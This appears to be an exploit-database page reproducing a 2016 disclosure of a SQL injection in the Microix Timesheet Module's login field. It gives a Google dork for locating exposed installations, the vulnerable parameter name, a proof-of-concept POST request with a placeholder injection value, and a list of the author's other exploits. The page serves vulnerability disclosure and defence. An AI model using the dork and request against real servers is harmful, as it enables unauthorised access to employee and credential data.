Search for hundreds of thousands of exploits

"Microix Timesheet Module - SQL Injection"

Author

Exploit author

"Anthony Cole"

Platform

Exploit platform

aspx

Release date

Exploit published date

2016-09-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Exploit Title: Microix timesheet module SQL Injection
# Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
# Date: 2016-09-06
# Software Link: http://www.microix.net/workflow-modules/timesheet-module/
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://www.3fforensics.com/
# CVE: 
# Category: webapps
 
1. Description
   
Microix timeclock is vulnerable to a SQL injection.  The field that is injectable is:

ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID

Initial contact attempt: 08/22/2016
2nd attempt: 08/29/2016
3rd attempt: 09/05/2016
4th attempt: 09/21/2016
   
2. Proof of Concept

POST /microixcloud/ HTTP/1.1
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin

 
3. Solution:
None
Release DateTitleTypePlatformAuthor
2020-05-12"TylerTech Eagle 2018.3.11 - Remote Code Execution"webappsjava"Anthony Cole"
2019-01-07"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data"webappswindows"Anthony Cole"
2017-10-24"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection"webappscfm"Anthony Cole"
2016-09-22"Microix Timesheet Module - SQL Injection"webappsaspx"Anthony Cole"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/40407/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.